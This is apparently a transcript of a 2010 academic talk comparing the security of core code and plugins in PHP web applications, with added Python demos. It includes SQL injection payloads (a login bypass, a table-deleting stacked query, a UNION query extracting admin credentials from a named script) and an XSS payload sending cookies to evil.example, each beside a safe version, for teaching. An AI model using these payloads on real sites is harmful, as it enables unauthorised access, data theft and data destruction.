James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.



2 Outline
1. Web Application Security
2. Plugins
3. Plugin Vulnerabilities
4. Comparing Core and Plugin Security
5. Vulnerabilities by Category
6. Conclusions
IMI Security Symposium 2010


5 [Diagram] The web client sends HTTP traffic on port 80 through the firewall to the web server, which calls the application, which queries the database server. The firewall blocks other services (telnet, ftp) but must pass port 80, so attacks carried inside HTTP requests reach the application unimpeded.

6 Web technology versus security defenses over time:
Year  Technology        Security
1993  CGI               Firewalls, SSL
1995  PHP, JavaScript   Firewalls, SSL
1997  ASP, JSP          Firewalls, SSL
2000  REST, SOA         Firewalls, SSL
2006  AJAX              Firewalls, SSL
The technology column changes in every row; the defenses do not.


9 SQL injection, step by step:
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds query string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, and sends data back to application.
6. Application returns data to user.
[Diagram: attacker, firewall, web server, DB server; login form with User and Pass fields, the password field holding ' or 1=1--]

10 Vulnerable PHP login code (the mysql_* extension it uses was deprecated in PHP 5.5 and removed in PHP 7; the injection flaw is the string building, not the extension):
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD)
    or die("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username = '$username' and password = '$password'";
$result = mysql_query($query);

11 Unauthorized access attempt: password = ' or 1=1 --
The SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --
AND binds tighter than OR, so the WHERE clause reads (username = 'user' and password = '') OR 1=1. Since 1=1 is always true, count(*) is non-zero for any username, and the check permits access without a valid password.

12 Database modification attack: password = foo'; delete from users where username like '%
The DB receives two SQL statements:
select count(*) from users where username = 'user' and password = 'foo';
delete from users where username like '%'
Caveat: PHP's mysql_query() sends a single statement and rejects stacked queries like this one, so this attack needs a database API that executes several statements per call (for example mysqli_multi_query()). The tautology attack on the previous slide has no such requirement.
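The two payloads from slides 11 and 12, run against the same kind of string-built login query. This is an added example for this transcript, not code from the talk: it uses Python with an in-memory SQLite database, the users table and its rows are constructed, and safe_login() is the parameterised form the slides do not show. It also demonstrates the single-statement caveat: sqlite3's execute(), like PHP's mysql_query(), refuses the stacked query, while a multi-statement API (executescript(), standing in for mysqli_multi_query()) runs the DELETE.

```python
import sqlite3

# Constructed sample rows standing in for the 'users' table behind the slide's PHP.
SAMPLE_USERS = [("alice", "wonderland"), ("bob", "builder")]


def fresh_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """Same string building as the PHP slide: attacker text becomes SQL syntax."""
    return ("select count(*) from users where username = '%s' "
            "and password = '%s'" % (username, password))


def vulnerable_login(conn, username, password):
    """Mirrors the slide: count(*) > 0 means 'logged in'. Single-statement API."""
    return conn.execute(build_query(username, password)).fetchone()[0] > 0


def vulnerable_login_multi(conn, username, password):
    """Same string, but through an API that accepts several statements
    (executescript, analogous to mysqli_multi_query). Returns rows left in users."""
    conn.executescript(build_query(username, password))
    return conn.execute("select count(*) from users").fetchone()[0]


def safe_login(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so
    quotes, comments and semicolons inside them never change the statement."""
    row = conn.execute(
        "select count(*) from users where username = ? and password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


TAUTOLOGY = "' or 1=1 --"                                   # slide 11 payload
STACKED = "foo'; delete from users where username like '%"  # slide 12 payload


def demo():
    """Run both payloads against the vulnerable and the safe login."""
    results = {}
    conn = fresh_db()
    results["normal"] = vulnerable_login(conn, "alice", "wonderland")
    results["tautology_vulnerable"] = vulnerable_login(conn, "user", TAUTOLOGY)
    results["tautology_safe"] = safe_login(conn, "user", TAUTOLOGY)
    # A single-statement API rejects the stacked query (older Pythons raise
    # sqlite3.Warning, newer ones sqlite3.ProgrammingError) ...
    try:
        vulnerable_login(conn, "user", STACKED)
        results["stacked_single_stmt"] = "executed"
    except (sqlite3.Warning, sqlite3.Error):
        results["stacked_single_stmt"] = "rejected"
    results["rows_after_single"] = conn.execute(
        "select count(*) from users").fetchone()[0]
    # ... while a multi-statement API runs the DELETE and empties the table.
    results["rows_after_multi"] = vulnerable_login_multi(conn, "user", STACKED)
    results["safe_normal"] = safe_login(fresh_db(), "alice", "wonderland")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "=", value)
```

The tautology payload succeeds against vulnerable_login() because the comment swallows the closing quote and 1=1 widens the WHERE clause to every row; against safe_login() the whole string is compared as a password and matches nothing.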

13 http://www.xkcd.com/327/ (the "Bobby Tables" cartoon on SQL injection)

14 Exploit against http://phprealestatescript.com/ (UNION-based SQL injection):
www.website.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
The id is pasted into the query unquoted. -1 matches no news row, so the page renders the UNION'd row instead; column 3 carries username:password from the admin table (char(58) is ':'), the /**/ comments stand in for spaces to slip past naive filters, and the trailing /* comments out whatever follows the id in the original query.
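The same UNION technique against a five-column query like fullnews.php's, as an added example (Python with an in-memory SQLite database; not code from the talk or from the site named above). The news and admin tables and their rows are constructed; the payload is the slide's, rendered in SQLite syntax: || replaces MySQL's concat(), and the trailing /* is dropped because nothing follows the id in this query.

```python
import sqlite3


def news_db():
    """Constructed stand-in for the site: a public five-column 'news' table
    (matching the 1,2,...,4,5 of the payload) and a private 'admin' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer, title text, body text, "
                 "author text, posted text)")
    conn.execute("insert into news values "
                 "(1, 'Open house', 'Sunday 2pm', 'agent', '2010-05-01')")
    conn.execute("create table admin (username text, password text)")
    conn.execute("insert into admin values ('admin', 's3cret')")  # made-up row
    return conn


def fullnews_vulnerable(conn, id_param):
    """Mirrors fullnews.php?id=...: the id is concatenated unquoted, as the
    numeric context of the original URL implies."""
    query = ("select id, title, body, author, posted from news where id = "
             + id_param)
    return conn.execute(query).fetchall()


def fullnews_safe(conn, id_param):
    """Hardened form: accept only an integer, then bind it as a parameter."""
    news_id = int(id_param)  # ValueError on anything that is not a number
    return conn.execute(
        "select id, title, body, author, posted from news where id = ?",
        (news_id,),
    ).fetchall()


# SQLite rendering of the slide's payload (see lead-in for the two differences).
UNION_PAYLOAD = ("-1/**/UNION/**/ALL/**/SELECT/**/1,2,"
                 "username||char(58)||password,4,5/**/FROM/**/admin")


def leaked_credentials(conn):
    """What a page that prints column 3 of each row would show the attacker."""
    return [row[2] for row in fullnews_vulnerable(conn, UNION_PAYLOAD)]


if __name__ == "__main__":
    db = news_db()
    print("vulnerable page shows:", leaked_credentials(db))
    try:
        fullnews_safe(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("hardened page rejects payload:", exc)
```

Binding the id as a parameter alone would also defeat the payload (the whole string would be compared against the integer column and match no row); the int() cast additionally turns the attempt into a visible error worth logging.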

15 Cross-site scripting (XSS): the attacker causes a legitimate web server to send the user executable content (JavaScript, Flash ActionScript) of the attacker's choosing.
XSS used to obtain the session ID for
◦ Bank site (transfer money to attacker)
◦ Shopping site (buy goods for attacker)
◦ E-mail
Key ideas
◦ Attacker sends malicious code to the server.
◦ Victim's browser loads the code from the server and runs it.

16 XSS session hijack, step by step:
1. User logs in to the web server.
2. Server sets a session cookie.
3. Attacker plants the XSS attack (injected code) on the server.
4. User clicks on the XSS link.
5. Browser requests the XSS URL.
6. Server returns the page with the injected code.
7. Browser runs the injected code, which sends the session ID to the attacker's site; the evil site saves it.
8. Attacker hijacks the user's session.
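The server side of steps 3, 6 and 7 in miniature, as an added example (Python; not code from the talk): a page that reflects a query parameter unescaped, the same page with HTML escaping, and the Set-Cookie header for the session ID with and without HttpOnly. The payload and the attacker hostname evil.example are constructed for the example; script_executes() is a crude stand-in for the browser.

```python
import html
from http.cookies import SimpleCookie

# Payload of the kind step 7 describes: script that ships the victim's cookie
# to an attacker-controlled host (evil.example is a placeholder).
XSS_PAYLOAD = ("<script>document.location='http://evil.example/?c='"
               "+document.cookie</script>")


def render_search_vulnerable(term):
    """Reflects the search term into the page unchanged, so markup in the
    query string becomes markup in the response."""
    return "<h1>Results for: %s</h1>" % term


def render_search_safe(term):
    """Escapes <, >, &, and quotes before interpolation: the browser renders
    the payload as text instead of executing it."""
    return "<h1>Results for: %s</h1>" % html.escape(term, quote=True)


def session_cookie_header(session_id, httponly):
    """Set-Cookie header for the session ID. With HttpOnly the browser keeps
    the cookie out of document.cookie, so even if the XSS fires, step 7
    (script reads the session ID) yields nothing."""
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["path"] = "/"
    cookie["sid"]["httponly"] = httponly
    return cookie.output(header="Set-Cookie:")


def script_executes(page):
    """Stand-in for the browser: a raw <script> tag means the injected code
    would run; an escaped one is just text on the page."""
    return "<script>" in page


if __name__ == "__main__":
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
    print(session_cookie_header("abc123", httponly=True))
```

Escaping on output stops the injection; HttpOnly limits the damage if some other page misses the escaping, which is why the two belong together rather than as alternatives.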

17 Are Individual Web Apps Worsening?


19 Plugins add features to apps:
◦ Advertising
◦ E-commerce
◦ Media
◦ Security
◦ Site navigation
◦ Statistics
◦ Themes
◦ User management

20 Is it the core code, or core code + plugins?
◦ Some apps are almost always deployed with plugins.
◦ Plugins are written by non-core developers.
◦ The core site may or may not track plugin security.
Some apps are packaged in distributions with plugins, such as Drupal, which has:
◦ OpenAtrium (Development Seed)
◦ Acquia Drupal
◦ OpenPublish
◦ Pressflow (Four Kitchens)

21 Research objective
Goal: identify differences between the security of core code and plugins for web applications.
Research questions:
1. Are plugins less secure than core code?
2. How are vulnerabilities distributed across plugins?
3. How do different applications compare in terms of plugin security?

22 Why open source?
◦ Evaluate source code that has no barriers to access.
◦ 85% of businesses use open source software.
◦ Probably all do if embedded open source is counted (printers, routers, projectors, etc.).
PHP is the most widely used language for open source web applications:
◦ 35.3% of web apps on Freshmeat are PHP, 14% Java.
◦ The most popular apps are written in PHP: Drupal, Joomla, MediaWiki, phpBB, phpMyAdmin, WordPress.


24 Open source web applications studied
Selection process
◦ PHP web applications from freshmeat.net.
◦ A central plugin repository.
◦ Automatable downloads.
◦ At least 10 plugins.
Why PHP?
◦ The most popular web applications are written in PHP.
◦ Applications can be compared evenly.
Range of projects
◦ 12 projects met the selection criteria.
◦ 13,535 plugins for these applications.
◦ Plugins per app ranged from 10 to 8,989.

25 Ways to measure vulnerabilities
Reported vulnerabilities in NVD or OSVDB
◦ Coarse-grained time evolution.
◦ Difficult to correlate with a revision.
◦ Undercounts actual vulnerabilities.
Dynamic analysis
◦ Expensive.
◦ False positives and negatives.
◦ Must install and execute the application.
Static analysis
◦ Expensive.
◦ False positives and negatives.
◦ Requires application installation.


29 SAVD (static analysis vulnerability density): number of vulnerabilities found by a static analysis tool per 1000 lines of source code.
◦ Tool: Fortify SourceAnalyzer 5.8.0
Aggregate SAVD
◦ Use the aggregate of source code for all plugins.
◦ Total vulnerabilities / total KSLOC.
Average SAVD
◦ Compute SAVD for each plugin individually.
◦ Average the individual plugin SAVD values.
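Aggregate and average SAVD computed side by side on constructed per-plugin numbers, as an added example (Python; not code or data from the study, whose counts came from Fortify). The plugin names, vulnerability counts and line counts are made up to show why the two metrics diverge: aggregate SAVD is a size-weighted density dominated by the largest plugins, while average SAVD gives every plugin one vote. A plain Spearman rank-correlation helper is included for relating plugin size to SAVD; it assumes no ties.

```python
from statistics import mean

# Constructed (vulnerability count, lines of code) per plugin; not study data.
PLUGINS = {
    "tiny_widget": (1, 500),
    "stats_bar":   (4, 1000),
    "gallery":     (30, 10000),
    "shop":        (500, 50000),
}


def savd(vulns, sloc):
    """Static analysis vulnerability density: findings per 1000 lines (KSLOC)."""
    return vulns / (sloc / 1000.0)


def aggregate_savd(plugins):
    """Pool all findings and all code, then divide once: large plugins dominate."""
    total_vulns = sum(v for v, _ in plugins.values())
    total_sloc = sum(s for _, s in plugins.values())
    return savd(total_vulns, total_sloc)


def average_savd(plugins):
    """SAVD per plugin, then the unweighted mean: every plugin counts once."""
    return mean(savd(v, s) for v, s in plugins.values())


def spearman_rho(xs, ys):
    """Spearman rank correlation for two equal-length sequences without ties:
    rho = 1 - 6 * sum(d^2) / (n * (n^2 - 1)), d = difference in ranks."""
    def ranks(values):
        order = sorted(range(len(values)), key=lambda i: values[i])
        r = [0] * len(values)
        for rank, i in enumerate(order, start=1):
            r[i] = rank
        return r
    rx, ry = ranks(xs), ranks(ys)
    n = len(xs)
    d2 = sum((a - b) ** 2 for a, b in zip(rx, ry))
    return 1 - 6 * d2 / (n * (n * n - 1))


def size_vs_savd_rho(plugins):
    """Rank correlation between plugin size (SLOC) and its SAVD."""
    sizes = [s for _, s in plugins.values()]
    densities = [savd(v, s) for v, s in plugins.values()]
    return spearman_rho(sizes, densities)


if __name__ == "__main__":
    for name, (v, s) in PLUGINS.items():
        print("%-12s SAVD = %.2f" % (name, savd(v, s)))
    print("aggregate SAVD = %.2f" % aggregate_savd(PLUGINS))
    print("average SAVD   = %.2f" % average_savd(PLUGINS))
    print("rho(size, SAVD) = %.2f" % size_vs_savd_rho(PLUGINS))
```

With these numbers the aggregate density (about 8.7) is almost twice the average (4.75) because the one large plugin carries most of the code and most of the findings; reporting both, as the talk does, keeps a handful of big plugins from hiding what the typical plugin looks like.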


31 Core code is developed by a small core team.
◦ Team experienced with the core code over years.
◦ May or may not be paid full-time developers.
◦ Most project sites have some form of security information.
Plugins are developed by many people.
◦ Wide variety of programming experience.
◦ Few develop more than one plugin, so they have little experience with the application compared to the core team.
◦ Few plugins mention security unless a vulnerability has been previously reported.


33 Drupal
◦ Drupal has tracked both core and plugin vulnerabilities since 2006.
◦ Most popular CMS with 1.58% of web sites, including whitehouse.gov.
◦ www.drupalsecurityreport.org
Security support for developers:
◦ Secure coding documentation.
◦ XSS filter API.
◦ DB API to handle SQLi attacks.
◦ Input validation API.


36 Mapped SCA categories to the OWASP Top 10 2010.
◦ SCA 5.8 reports 73 categories; only 25 occur in this code.
◦ 18 of the 25 categories mapped to 5 of the OWASP Top 10.
◦ The 7 remaining categories did not map to the Top 10.


38 www.drupalsecurityreport.org


40 Conclusions
Plugins are slightly less secure than core.
◦ Plugins made up 91% of 11.7 MLOC.
◦ They contained 92% of 135,907 vulnerabilities.
◦ The vulnerability share barely exceeds the code share, which is why the plugin SAVD is only slightly above the core SAVD.
Plugin SAVD correlates with code size.
◦ ρ = 0.91 (strong correlation).
◦ Larger plugins have a higher vulnerability density, not merely more vulnerabilities.
Core SAVD does not correlate with code size.


42 [Chart comparing 2006 and 2008]
